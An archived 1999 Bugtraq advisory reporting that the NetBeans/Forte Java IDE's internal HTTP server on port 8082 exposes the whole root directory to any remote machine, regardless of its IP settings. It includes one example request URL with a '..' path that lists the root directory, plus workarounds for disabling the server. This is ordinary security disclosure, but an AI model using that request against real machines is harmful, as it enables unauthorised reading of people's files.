Bugtraq mailing list archives
NetBeans/ Forte' Java IDE HTTP vulnerability
From: hskinner () JHSPH EDU (Halcyon Skinner)
Date: Tue, 23 Nov 1999 12:32:00 -0500
Vulnerable Application: Sun Microsystems NetBeans (recently renamed to Forte') Java IDE Versions tested: Netbeans Developer 3.0 Beta Forte Community Edition 1.0 Beta unknown if earlier versions have vulnerability Platform tested: Windows NT 4.0 unknown if other platforms have vulnerability Description: The IDE includes an internal HTTP server to try Java code. The settings indicate that access must be explicitly granted on a per IP address bases. However, when service is enabled for one machine, the HTTP server allows remote access to root and all subdirectories from any machine. NOTE, for the NetBeans 3.0 Beta version, this is the default activity. Therefore, no action is required by the user for the vulnerability to exist. Under the Forte' 1.0 Beta version, a user must enable at least one address in the HTTP server settings for the vulnerability to exist. However, once a single IP address is entered, any machine can connect to the internal HTTP server port (default is 8082). Even if all IP addresses are removed, the server continues to allow connections when the IDE is running. Example: While the IDE is running connecting with any browser to http://vvv.xxx.yyy.zzz:8082/.. provides a listing of the root directory. Sub-directories can then be accessed. Solution (work around): 1) Set the HTTP Server "Enable" setting to False in Project settings. or 2) Remove the HTTP Server module in Global settings. Vendor notified: Yes.
Current thread:
- Notifying Vendors Kerb (Nov 18)
- (no subject) Anonymous (Nov 19)
- Caldera Pine Advisory Alfred Huger (Nov 22)
- Re: Caldera Pine Advisory CyberPsychotic (Nov 18)
- NetBeans/ Forte' Java IDE HTTP vulnerability Halcyon Skinner (Nov 23)